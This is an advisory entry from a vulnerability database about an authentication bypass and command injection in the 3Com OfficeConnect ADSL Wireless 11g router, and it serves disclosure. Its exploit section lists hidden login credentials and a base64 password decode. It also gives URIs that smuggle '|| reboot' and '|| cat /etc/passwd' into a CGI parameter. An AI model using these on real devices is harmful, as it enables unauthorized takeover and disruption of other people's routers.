ID

VAR-E-200910-0398


TITLE

3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities

Trust: 0.3

sources: BID: 36722

DESCRIPTION

3Com OfficeConnect ADSL Wireless 11g Firewall Router is prone to an authentication-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to gain unauthorized administrative access to the affected device or execute arbitrary commands. Successful exploits will completely compromise the device.

Trust: 0.3

sources: BID: 36722

AFFECTED PRODUCTS

vendor:3commodel:officeconnect adsl wireless 11g firewall routerscope:eqversion:3.0

Trust: 0.3

sources: BID: 36722

EXPLOIT

Attackers can use readily available tools to exploit these issues.
These example URIs and proof of concept demonstrate the issues:
1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
5) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty
http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd

Trust: 0.3

sources: BID: 36722

PRICE

Free

Trust: 0.3

sources: BID: 36722

TYPE

Access Validation Error

Trust: 0.3

sources: BID: 36722

CREDITS

Andrea Fabrizi

Trust: 0.3

sources: BID: 36722

EXTERNAL IDS

db:BIDid:36722

Trust: 0.3

sources: BID: 36722

REFERENCES

url:http://www.3com.com/products/en_us/detail.jsp?tab=features&sku=3crwe754g72-a&pathtype=purchase

Trust: 0.3

sources: BID: 36722

SOURCES

db:BIDid:36722

LAST UPDATE DATE

2022-07-27T09:59:29.044000+00:00


SOURCES UPDATE DATE

db:BIDid:36722date:2009-10-19T19:18:00

SOURCES RELEASE DATE

db:BIDid:36722date:2009-10-19T00:00:00